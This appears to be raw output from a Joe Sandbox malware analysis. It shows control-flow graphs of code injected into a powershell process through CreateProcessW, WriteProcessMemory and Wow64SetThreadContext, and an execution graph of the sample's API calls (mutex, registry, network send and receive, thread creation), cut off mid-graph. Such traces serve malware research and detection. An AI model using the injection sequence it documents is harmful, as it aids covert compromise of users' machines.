                                                                              control_flow_graph 1552 42f75a4-42fca99 1554 42fca9b-42fca9e 1552->1554 1555 42fcaa1-42fcaa8 1552->1555 1554->1555 1556 42fcaaa-42fcab0 1555->1556 1557 42fcab3-42fcac9 1555->1557 1556->1557 1558 42fcacb-42fcad1 1557->1558 1559 42fcad4-42fcb77 CreateProcessW 1557->1559 1558->1559 1561 42fcb79-42fcb7f 1559->1561 1562 42fcb80-42fcbf8 1559->1562 1561->1562 1569 42fcc0a-42fcc11 1562->1569 1570 42fcbfa-42fcc00 1562->1570 1571 42fcc28 1569->1571 1572 42fcc13-42fcc22 1569->1572 1570->1569 1574 42fcc29 1571->1574 1572->1571 1574->1574
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 042FCB64
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2097034485.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_42f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: bc43bf8075e0ef096f2405b93ff88e2ad90b356b37cacff4790d7b64d50d9f90
                                                                              • Instruction ID: 66d816353263005dabe735029901192721f72670c521b4bb53b5070976124c47
                                                                              • Opcode Fuzzy Hash: bc43bf8075e0ef096f2405b93ff88e2ad90b356b37cacff4790d7b64d50d9f90
                                                                              • Instruction Fuzzy Hash: DB51297190122EDFDB24CF99C940BDDBBB5BF48314F1085AAE909B7250D775AA88CF90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1575 42f75c8-42fd21e 1577 42fd228-42fd261 WriteProcessMemory 1575->1577 1578 42fd220-42fd226 1575->1578 1579 42fd26a-42fd28b 1577->1579 1580 42fd263-42fd269 1577->1580 1578->1577 1580->1579
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A37789D,00000000,?,?,?,192B18E4,00000000,?,042FC363,?,00000000,?), ref: 042FD254
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2097034485.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_42f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: bd75fb02769f1b603a22ce6fa8b2f187d0349a2a4a8e62dd8adee5b6c8ef19a0
                                                                              • Instruction ID: 8dc5ad0de6fe976d27238d660ac97acd357f0541cee11324ccbe4ae3b5a957cf
                                                                              • Opcode Fuzzy Hash: bd75fb02769f1b603a22ce6fa8b2f187d0349a2a4a8e62dd8adee5b6c8ef19a0
                                                                              • Instruction Fuzzy Hash: FA21F5B59103099FDB10CF9AD884BDEFBF4FB48320F508429E919A7201D378A944CFA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1582 42f75b0-42fcca0 1584 42fccac-42fccd8 Wow64SetThreadContext 1582->1584 1585 42fcca2-42fccaa 1582->1585 1586 42fccda-42fcce0 1584->1586 1587 42fcce1-42fcd02 1584->1587 1585->1584 1586->1587
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,192B18E4,?,?,042FC03A), ref: 042FCCCB
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2097034485.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_42f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 92f9cef8041de46ce830ddd890941431f88eced56d377f6753e3367582cb45e4
                                                                              • Instruction ID: 907da68305a0f3b2e77f599985fc02f0e8ed22ab5d0f009576b752c58d93363b
                                                                              • Opcode Fuzzy Hash: 92f9cef8041de46ce830ddd890941431f88eced56d377f6753e3367582cb45e4
                                                                              • Instruction Fuzzy Hash: 7F1123B2A102498FDB10CF9AC944BDEFBF4FB88320F548029E558A3200E378A544CFA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1589 42f75d4-42fcca0 1591 42fccac-42fccd8 Wow64SetThreadContext 1589->1591 1592 42fcca2-42fccaa 1589->1592 1593 42fccda-42fcce0 1591->1593 1594 42fcce1-42fcd02 1591->1594 1592->1591 1593->1594
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,192B18E4,?,?,042FC03A), ref: 042FCCCB
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2097034485.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_42f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 90da49bdfbe2c817876bc6c2101b3cca75e596125acbc46185d248c5a91892a6
                                                                              • Instruction ID: 7fb1031c1ad0d18ed238ee63e7945e9f9b7528362ce42df88714a5ed44fa2213
                                                                              • Opcode Fuzzy Hash: 90da49bdfbe2c817876bc6c2101b3cca75e596125acbc46185d248c5a91892a6
                                                                              • Instruction Fuzzy Hash: D01123B2A102498FDB10CF9AC944BDEFBF4FF88320F548029E558A3200E378A544CFA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1596 42fcc58-42fcca0 1599 42fccac-42fccd8 Wow64SetThreadContext 1596->1599 1600 42fcca2-42fccaa 1596->1600 1601 42fccda-42fcce0 1599->1601 1602 42fcce1-42fcd02 1599->1602 1600->1599 1601->1602
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,192B18E4,?,?,042FC03A), ref: 042FCCCB
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2097034485.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_42f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 795cc84ca4e8674e6b46cc36b270181697a7ac3631c07a73a7d8e44ec45ebfe0
                                                                              • Instruction ID: 291754e088ee898cf3524da4350b1aa8813fdf14d6fcda59fd88da50f0c1ae41
                                                                              • Opcode Fuzzy Hash: 795cc84ca4e8674e6b46cc36b270181697a7ac3631c07a73a7d8e44ec45ebfe0
                                                                              • Instruction Fuzzy Hash: B71123B2D102498FDB10CFAAC844BDEFBF4BB89320F148529E568A3650D778A544CFA5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2144582339.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7170000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q
                                                                              • API String ID: 0-1614139903
                                                                              • Opcode ID: 58217d509b2bc747d30741daf4de39eceaf28574ced09efdf7b90e8cd90add53
                                                                              • Instruction ID: 682d5c79291aac78e1fa2c652b816d367ef959ddb74a7fd194ace86af288047e
                                                                              • Opcode Fuzzy Hash: 58217d509b2bc747d30741daf4de39eceaf28574ced09efdf7b90e8cd90add53
                                                                              • Instruction Fuzzy Hash: 8F21FBB0A05306EFCB25CF25C844BB67BF1BF81711F1580A6D548CB1A1D735C889CBA2
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2095207773.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_292d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8e7f8d9ba750827f7e86900a6313d44955b205c0d2df1ce503b254655cd2ea39
                                                                              • Instruction ID: 5b246d8ac1b764f58a192db100970a0f1f47dec4f4929b1c347bd1c4882c425d
                                                                              • Opcode Fuzzy Hash: 8e7f8d9ba750827f7e86900a6313d44955b205c0d2df1ce503b254655cd2ea39
                                                                              • Instruction Fuzzy Hash: B0012B310493109AE7104E25CD84767FF9CDF45324F08C429ED484B15AC379D849C6F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2095207773.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_292d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 234fa639a6a1f64f805a178018d43b77d6144101b817dc53dffbf1cf3fd06552
                                                                              • Instruction ID: a032bc88b6d9752e1baf27b2b27da2dbf1960cffc11fedf3e5db75631cccbfb5
                                                                              • Opcode Fuzzy Hash: 234fa639a6a1f64f805a178018d43b77d6144101b817dc53dffbf1cf3fd06552
                                                                              • Instruction Fuzzy Hash: 1701406104E3D05ED7124B258894756BFB8DF47224F1DC1DBD9888F1A7C2699849C772
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2097034485.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_42f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 46a2239ebdb5eb85e15df310f30f9d343e5a4ee35082e22c4dd584a247c2f4ce
                                                                              • Instruction ID: 54f46561bef9b571ba0f816269934e23d2fe9d297d2b45d60440404ba4e781fa
                                                                              • Opcode Fuzzy Hash: 46a2239ebdb5eb85e15df310f30f9d343e5a4ee35082e22c4dd584a247c2f4ce
                                                                              • Instruction Fuzzy Hash: C8F17031B2450ADFDB11CF98CD80AAAF7B6EB44300F91C476E60A97241E775F986CB91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2144582339.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7170000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: d096e52ad76b8c814ccbc02cf896596e2205cce7d35a7653d97339d8172461a4
                                                                              • Instruction ID: 48d2edc9996cd621cad895a9a2fc90cdf6b2d13bc4a680705c8825d4b53c4950
                                                                              • Opcode Fuzzy Hash: d096e52ad76b8c814ccbc02cf896596e2205cce7d35a7653d97339d8172461a4
                                                                              • Instruction Fuzzy Hash: C90162A1B4A3854FC72B122818305566FB65BC761072A88DBE041DF2EBCE558D4AC7B6

                                                                              Execution Graph

                                                                              Execution Coverage:3.3%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:6.6%
                                                                              Total number of Nodes:1129
                                                                              Total number of Limit Nodes:51
                                                                              execution_graph 45569 41d4d0 45570 41d4e6 ctype ___scrt_fastfail 45569->45570 45584 41d6e3 45570->45584 45590 431f99 21 API calls ___crtLCMapStringA 45570->45590 45573 41d6f4 45575 41d734 45573->45575 45576 41d760 45573->45576 45586 431f99 21 API calls ___crtLCMapStringA 45573->45586 45574 41d696 ___scrt_fastfail 45574->45575 45591 431f99 21 API calls ___crtLCMapStringA 45574->45591 45576->45575 45593 41d474 21 API calls ___scrt_fastfail 45576->45593 45580 41d72d ___scrt_fastfail 45580->45575 45587 43264f 45580->45587 45582 41d6be ___scrt_fastfail 45582->45575 45592 431f99 21 API calls ___crtLCMapStringA 45582->45592 45584->45575 45585 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 45584->45585 45585->45573 45586->45580 45594 43256f 45587->45594 45589 432657 45589->45576 45590->45574 45591->45582 45592->45584 45593->45575 45595 432588 45594->45595 45599 43257e 45594->45599 45595->45599 45600 431f99 21 API calls ___crtLCMapStringA 45595->45600 45597 4325a9 45597->45599 45601 43293a CryptAcquireContextA 45597->45601 45599->45589 45600->45597 45602 43295b CryptGenRandom 45601->45602 45604 432956 45601->45604 45603 432970 CryptReleaseContext 45602->45603 45602->45604 45603->45604 45604->45599 45605 426030 45610 4260f7 recv 45605->45610 45611 44e8b6 45612 44e8c1 45611->45612 45613 44e8e9 45612->45613 45614 44e8da 45612->45614 45615 44e8f8 45613->45615 45633 455573 27 API calls 2 library calls 45613->45633 45632 445354 20 API calls _free 45614->45632 45620 44b9be 45615->45620 45619 44e8df ___scrt_fastfail 45621 44b9d6 45620->45621 45622 44b9cb 45620->45622 45624 44b9de 45621->45624 45630 44b9e7 _strftime 45621->45630 45634 446aff 21 API calls 3 library calls 45622->45634 45635 446ac5 20 API calls _free 45624->45635 45626 44ba11 RtlReAllocateHeap 45628 44b9d3 45626->45628 45626->45630 45627 44b9ec 45636 445354 20 API calls _free 45627->45636 45628->45619 45630->45626 45630->45627 45637 442200 7 API calls 2 library calls 45630->45637 45632->45619 45633->45615 45634->45628 45635->45628 45636->45628 45637->45630 45638 426091 45643 42610e send 45638->45643 45644 43a998 45647 43a9a4 _swprintf __FrameHandler3::FrameUnwindToState 45644->45647 45645 43a9b2 45662 445354 20 API calls _free 45645->45662 45647->45645 45650 43a9dc 45647->45650 45648 43a9b7 45663 43a827 26 API calls _Deallocate 45648->45663 45657 444acc EnterCriticalSection 45650->45657 45652 43a9e7 45658 43aa88 45652->45658 45654 43a9c2 std::_Locinfo::_Locinfo_ctor 45657->45652 45660 43aa96 45658->45660 45659 43a9f2 45664 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 45659->45664 45660->45659 45665 448416 39 API calls 2 library calls 45660->45665 45662->45648 45663->45654 45664->45654 45665->45660 45666 402bcc 45667 402bd7 45666->45667 45668 402bdf 45666->45668 45684 403315 28 API calls _Deallocate 45667->45684 45670 402beb 45668->45670 45674 4015d3 45668->45674 45671 402bdd 45676 43360d 45674->45676 45677 402be9 45676->45677 45680 43362e std::_Facet_Register 45676->45680 45685 43a88c 45676->45685 45692 442200 7 API calls 2 library calls 45676->45692 45679 433dec std::_Facet_Register 45694 437bd7 RaiseException 45679->45694 45680->45679 45693 437bd7 RaiseException 45680->45693 45683 433e09 45684->45671 45690 446aff _strftime 45685->45690 45686 446b3d 45696 445354 20 API calls _free 45686->45696 45687 446b28 RtlAllocateHeap 45689 446b3b 45687->45689 45687->45690 45689->45676 45690->45686 45690->45687 45695 442200 7 API calls 2 library calls 45690->45695 45692->45676 45693->45679 45694->45683 45695->45690 45696->45689 45697 4339be 45698 4339ca __FrameHandler3::FrameUnwindToState 45697->45698 45729 4336b3 45698->45729 45700 4339d1 45701 433b24 45700->45701 45704 4339fb 45700->45704 46029 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 45701->46029 45703 433b2b 46030 4426be 28 API calls _abort 45703->46030 45716 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 45704->45716 46023 4434d1 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 45704->46023 45706 433b31 46031 442670 28 API calls _abort 45706->46031 45709 433a14 45711 433a1a 45709->45711 46024 443475 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 45709->46024 45710 433b39 45713 433a9b 45740 433c5e 45713->45740 45716->45713 46025 43edf4 38 API calls 3 library calls 45716->46025 45723 433abd 45723->45703 45724 433ac1 45723->45724 45725 433aca 45724->45725 46027 442661 28 API calls _abort 45724->46027 46028 433842 13 API calls 2 library calls 45725->46028 45728 433ad2 45728->45711 45730 4336bc 45729->45730 46032 433e0a IsProcessorFeaturePresent 45730->46032 45732 4336c8 46033 4379ee 10 API calls 3 library calls 45732->46033 45734 4336cd 45739 4336d1 45734->45739 46034 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45734->46034 45736 4336da 45737 4336e8 45736->45737 46035 437a17 8 API calls 3 library calls 45736->46035 45737->45700 45739->45700 46036 436050 45740->46036 45743 433aa1 45744 443422 45743->45744 46038 44ddc9 45744->46038 45746 44342b 45748 433aaa 45746->45748 46042 44e0d3 38 API calls 45746->46042 45749 40d767 45748->45749 46044 41bce3 LoadLibraryA GetProcAddress 45749->46044 45751 40d783 GetModuleFileNameW 46049 40e168 45751->46049 45753 40d79f 46064 401fbd 45753->46064 45756 401fbd 28 API calls 45757 40d7bd 45756->45757 46068 41afc3 45757->46068 45761 40d7cf 46093 401d8c 45761->46093 45763 40d7d8 45764 40d835 45763->45764 45765 40d7eb 45763->45765 46099 401d64 45764->46099 46350 40e986 90 API calls 45765->46350 45768 40d845 45771 401d64 28 API calls 45768->45771 45769 40d7fd 45770 401d64 28 API calls 45769->45770 45774 40d809 45770->45774 45772 40d864 45771->45772 46104 404cbf 45772->46104 46351 40e937 68 API calls 45774->46351 45775 40d873 46108 405ce6 45775->46108 45778 40d87f 46111 401eef 45778->46111 45779 40d824 46352 40e155 68 API calls 45779->46352 45782 40d88b 46115 401eea 45782->46115 45784 40d894 45786 401eea 26 API calls 45784->45786 45785 401eea 26 API calls 45787 40dc9f 45785->45787 45788 40d89d 45786->45788 46026 433c94 GetModuleHandleW 45787->46026 45789 401d64 28 API calls 45788->45789 45790 40d8a6 45789->45790 46119 401ebd 45790->46119 45792 40d8b1 45793 401d64 28 API calls 45792->45793 45794 40d8ca 45793->45794 45795 401d64 28 API calls 45794->45795 45797 40d8e5 45795->45797 45796 40d946 45799 401d64 28 API calls 45796->45799 45814 40e134 45796->45814 45797->45796 46353 4085b4 45797->46353 45804 40d95d 45799->45804 45800 40d912 45801 401eef 26 API calls 45800->45801 45802 40d91e 45801->45802 45805 401eea 26 API calls 45802->45805 45803 40d9a4 46123 40bed7 45803->46123 45804->45803 45809 4124b7 3 API calls 45804->45809 45806 40d927 45805->45806 46357 4124b7 RegOpenKeyExA 45806->46357 45808 40d9aa 45810 40d82d 45808->45810 46126 41a463 45808->46126 45815 40d988 45809->45815 45810->45785 45813 40d9c5 45816 40da18 45813->45816 46143 40697b 45813->46143 46433 412902 30 API calls 45814->46433 45815->45803 46360 412902 30 API calls 45815->46360 45818 401d64 28 API calls 45816->45818 45821 40da21 45818->45821 45830 40da32 45821->45830 45831 40da2d 45821->45831 45823 40e14a 46434 4112b5 64 API calls ___scrt_fastfail 45823->46434 45824 40d9e4 46361 40699d 30 API calls 45824->46361 45825 40d9ee 45827 401d64 28 API calls 45825->45827 45838 40d9f7 45827->45838 45833 401d64 28 API calls 45830->45833 46364 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 45831->46364 45832 40d9e9 46362 4064d0 97 API calls 45832->46362 45836 40da3b 45833->45836 46147 41ae08 45836->46147 45838->45816 45841 40da13 45838->45841 45839 40da46 46151 401e18 45839->46151 46363 4064d0 97 API calls 45841->46363 45842 40da51 46155 401e13 45842->46155 45845 40da5a 45846 401d64 28 API calls 45845->45846 45847 40da63 45846->45847 45848 401d64 28 API calls 45847->45848 45849 40da7d 45848->45849 45850 401d64 28 API calls 45849->45850 45851 40da97 45850->45851 45852 401d64 28 API calls 45851->45852 45854 40dab0 45852->45854 45853 40db1d 45855 40db2c 45853->45855 45862 40dcaa ___scrt_fastfail 45853->45862 45854->45853 45856 401d64 28 API calls 45854->45856 45857 40db35 45855->45857 45885 40dbb1 ___scrt_fastfail 45855->45885 45860 40dac5 _wcslen 45856->45860 45858 401d64 28 API calls 45857->45858 45859 40db3e 45858->45859 45861 401d64 28 API calls 45859->45861 45860->45853 45863 401d64 28 API calls 45860->45863 45864 40db50 45861->45864 46424 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 45862->46424 45865 40dae0 45863->45865 45867 401d64 28 API calls 45864->45867 45868 401d64 28 API calls 45865->45868 45869 40db62 45867->45869 45870 40daf5 45868->45870 45873 401d64 28 API calls 45869->45873 46365 40c89e 45870->46365 45871 40dcef 45872 401d64 28 API calls 45871->45872 45874 40dd16 45872->45874 45876 40db8b 45873->45876 46169 401f66 45874->46169 45879 401d64 28 API calls 45876->45879 45878 401e18 26 API calls 45881 40db14 45878->45881 45882 40db9c 45879->45882 45884 401e13 26 API calls 45881->45884 46422 40bc67 45 API calls _wcslen 45882->46422 45883 40dd25 46173 4126d2 RegCreateKeyA 45883->46173 45884->45853 46159 4128a2 45885->46159 45889 40dc45 ctype 45894 401d64 28 API calls 45889->45894 45890 40dbac 45890->45885 45892 401d64 28 API calls 45893 40dd47 45892->45893 46179 43a5e7 45893->46179 45895 40dc5c 45894->45895 45895->45871 45899 40dc70 45895->45899 45898 40dd5e 46425 41beb0 86 API calls ___scrt_fastfail 45898->46425 45901 401d64 28 API calls 45899->45901 45900 40dd81 45905 401f66 28 API calls 45900->45905 45903 40dc7e 45901->45903 45906 41ae08 28 API calls 45903->45906 45904 40dd65 CreateThread 45904->45900 46991 41c96f 10 API calls 45904->46991 45907 40dd96 45905->45907 45908 40dc87 45906->45908 45909 401f66 28 API calls 45907->45909 46423 40e219 109 API calls 45908->46423 45911 40dda5 45909->45911 46183 41a686 45911->46183 45912 40dc8c 45912->45871 45914 40dc93 45912->45914 45914->45810 45916 401d64 28 API calls 45917 40ddb6 45916->45917 45918 401d64 28 API calls 45917->45918 45919 40ddcb 45918->45919 45920 401d64 28 API calls 45919->45920 45921 40ddeb 45920->45921 45922 43a5e7 42 API calls 45921->45922 45923 40ddf8 45922->45923 45924 401d64 28 API calls 45923->45924 45925 40de03 45924->45925 45926 401d64 28 API calls 45925->45926 45927 40de14 45926->45927 45928 401d64 28 API calls 45927->45928 45929 40de29 45928->45929 45930 401d64 28 API calls 45929->45930 45931 40de3a 45930->45931 45932 40de41 StrToIntA 45931->45932 46207 409517 45932->46207 45935 401d64 28 API calls 45936 40de5c 45935->45936 45937 40dea1 45936->45937 45938 40de68 45936->45938 45941 401d64 28 API calls 45937->45941 46426 43360d 22 API calls 3 library calls 45938->46426 45940 40de71 45942 401d64 28 API calls 45940->45942 45943 40deb1 45941->45943 45944 40de84 45942->45944 45945 40def9 45943->45945 45946 40debd 45943->45946 45947 40de8b CreateThread 45944->45947 45949 401d64 28 API calls 45945->45949 46427 43360d 22 API calls 3 library calls 45946->46427 45947->45937 46995 419128 102 API calls __EH_prolog 45947->46995 45951 40df02 45949->45951 45950 40dec6 45952 401d64 28 API calls 45950->45952 45954 40df6c 45951->45954 45955 40df0e 45951->45955 45953 40ded8 45952->45953 45956 40dedf CreateThread 45953->45956 45957 401d64 28 API calls 45954->45957 45958 401d64 28 API calls 45955->45958 45956->45945 46994 419128 102 API calls __EH_prolog 45956->46994 45959 40df75 45957->45959 45960 40df1e 45958->45960 45961 40df81 45959->45961 45962 40dfba 45959->45962 45963 401d64 28 API calls 45960->45963 45964 401d64 28 API calls 45961->45964 46232 41a7a2 GetComputerNameExW GetUserNameW 45962->46232 45965 40df33 45963->45965 45967 40df8a 45964->45967 46428 40c854 31 API calls 45965->46428 45973 401d64 28 API calls 45967->45973 45969 401e18 26 API calls 45970 40dfce 45969->45970 45972 401e13 26 API calls 45970->45972 45975 40dfd7 45972->45975 45976 40df9f 45973->45976 45974 40df46 45977 401e18 26 API calls 45974->45977 45978 40dfe0 SetProcessDEPPolicy 45975->45978 45979 40dfe3 CreateThread 45975->45979 45986 43a5e7 42 API calls 45976->45986 45980 40df52 45977->45980 45978->45979 45981 40e004 45979->45981 45982 40dff8 CreateThread 45979->45982 46964 40e54f 45979->46964 45983 401e13 26 API calls 45980->45983 45984 40e019 45981->45984 45985 40e00d CreateThread 45981->45985 45982->45981 46996 410f36 136 API calls 45982->46996 45987 40df5b CreateThread 45983->45987 45989 40e073 45984->45989 45991 401f66 28 API calls 45984->45991 45985->45984 46992 411524 38 API calls ___scrt_fastfail 45985->46992 45988 40dfac 45986->45988 45987->45954 46993 40196b 49 API calls 45987->46993 46429 40b95c 7 API calls 45988->46429 46243 41246e RegOpenKeyExA 45989->46243 45992 40e046 45991->45992 46430 404c9e 28 API calls 45992->46430 45995 40e053 45997 401f66 28 API calls 45995->45997 45999 40e062 45997->45999 45998 40e12a 46255 40cbac 45998->46255 46002 41a686 79 API calls 45999->46002 46001 41ae08 28 API calls 46004 40e0a4 46001->46004 46005 40e067 46002->46005 46246 412584 RegOpenKeyExW 46004->46246 46007 401eea 26 API calls 46005->46007 46007->45989 46010 401e13 26 API calls 46013 40e0c5 46010->46013 46011 40e0ed DeleteFileW 46012 40e0f4 46011->46012 46011->46013 46015 41ae08 28 API calls 46012->46015 46013->46011 46013->46012 46014 40e0db Sleep 46013->46014 46431 401e07 46014->46431 46017 40e104 46015->46017 46251 41297a RegOpenKeyExW 46017->46251 46019 40e117 46020 401e13 26 API calls 46019->46020 46021 40e121 46020->46021 46022 401e13 26 API calls 46021->46022 46022->45998 46023->45709 46024->45716 46025->45713 46026->45723 46027->45725 46028->45728 46029->45703 46030->45706 46031->45710 46032->45732 46033->45734 46034->45736 46035->45739 46037 433c71 GetStartupInfoW 46036->46037 46037->45743 46039 44dddb 46038->46039 46040 44ddd2 46038->46040 46039->45746 46043 44dcc8 51 API calls 4 library calls 46040->46043 46042->45746 46043->46039 46045 41bd22 LoadLibraryA GetProcAddress 46044->46045 46046 41bd12 GetModuleHandleA GetProcAddress 46044->46046 46047 41bd4b 32 API calls 46045->46047 46048 41bd3b LoadLibraryA GetProcAddress 46045->46048 46046->46045 46047->45751 46048->46047 46435 41a63f FindResourceA 46049->46435 46052 43a88c ___crtLCMapStringA 21 API calls 46053 40e192 ctype 46052->46053 46438 401f86 46053->46438 46056 401eef 26 API calls 46057 40e1b8 46056->46057 46058 401eea 26 API calls 46057->46058 46059 40e1c1 46058->46059 46060 43a88c ___crtLCMapStringA 21 API calls 46059->46060 46061 40e1d2 ctype 46060->46061 46442 406052 46061->46442 46063 40e205 46063->45753 46065 401fcc 46064->46065 46450 402501 46065->46450 46067 401fea 46067->45756 46069 41afd6 46068->46069 46073 41b048 46069->46073 46081 401eef 26 API calls 46069->46081 46083 401eea 26 API calls 46069->46083 46088 41b046 46069->46088 46455 403b60 28 API calls 46069->46455 46456 41bfa9 46069->46456 46070 401eea 26 API calls 46071 41b078 46070->46071 46072 401eea 26 API calls 46071->46072 46074 41b080 46072->46074 46463 403b60 28 API calls 46073->46463 46077 401eea 26 API calls 46074->46077 46079 40d7c6 46077->46079 46078 41b054 46080 401eef 26 API calls 46078->46080 46089 40e8bd 46079->46089 46082 41b05d 46080->46082 46081->46069 46084 401eea 26 API calls 46082->46084 46083->46069 46085 41b065 46084->46085 46086 41bfa9 28 API calls 46085->46086 46086->46088 46088->46070 46090 40e8ca 46089->46090 46092 40e8da 46090->46092 46491 40200a 26 API calls 46090->46491 46092->45761 46094 40200a 46093->46094 46098 40203a 46094->46098 46492 402654 26 API calls 46094->46492 46096 40202b 46493 4026ba 26 API calls _Deallocate 46096->46493 46098->45763 46101 401d6c 46099->46101 46100 401d74 46100->45768 46101->46100 46494 401fff 28 API calls 46101->46494 46105 404ccb 46104->46105 46495 402e78 46105->46495 46107 404cee 46107->45775 46504 404bc4 46108->46504 46110 405cf4 46110->45778 46112 401efe 46111->46112 46114 401f0a 46112->46114 46513 4021b9 26 API calls 46112->46513 46114->45782 46116 4021b9 46115->46116 46117 4021e8 46116->46117 46514 40262e 26 API calls _Deallocate 46116->46514 46117->45784 46121 401ec9 46119->46121 46120 401ee4 46120->45792 46121->46120 46122 402325 28 API calls 46121->46122 46122->46120 46515 401e8f 46123->46515 46125 40bee1 CreateMutexA GetLastError 46125->45808 46517 41b15b 46126->46517 46131 401eef 26 API calls 46132 41a49f 46131->46132 46133 401eea 26 API calls 46132->46133 46134 41a4a7 46133->46134 46135 41a4fa 46134->46135 46136 412513 31 API calls 46134->46136 46135->45813 46137 41a4cd 46136->46137 46138 41a4d8 StrToIntA 46137->46138 46139 41a4ef 46138->46139 46140 41a4e6 46138->46140 46142 401eea 26 API calls 46139->46142 46525 41c102 28 API calls 46140->46525 46142->46135 46144 40698f 46143->46144 46145 4124b7 3 API calls 46144->46145 46146 406996 46145->46146 46146->45824 46146->45825 46148 41ae1c 46147->46148 46526 40b027 46148->46526 46150 41ae24 46150->45839 46152 401e27 46151->46152 46153 401e33 46152->46153 46535 402121 26 API calls 46152->46535 46153->45842 46157 402121 46155->46157 46156 402150 46156->45845 46157->46156 46536 402718 26 API calls _Deallocate 46157->46536 46160 4128c0 46159->46160 46161 406052 28 API calls 46160->46161 46162 4128d5 46161->46162 46163 401fbd 28 API calls 46162->46163 46164 4128e5 46163->46164 46165 4126d2 29 API calls 46164->46165 46166 4128ef 46165->46166 46167 401eea 26 API calls 46166->46167 46168 4128fc 46167->46168 46168->45889 46170 401f6e 46169->46170 46537 402301 46170->46537 46174 412722 46173->46174 46176 4126eb 46173->46176 46175 401eea 26 API calls 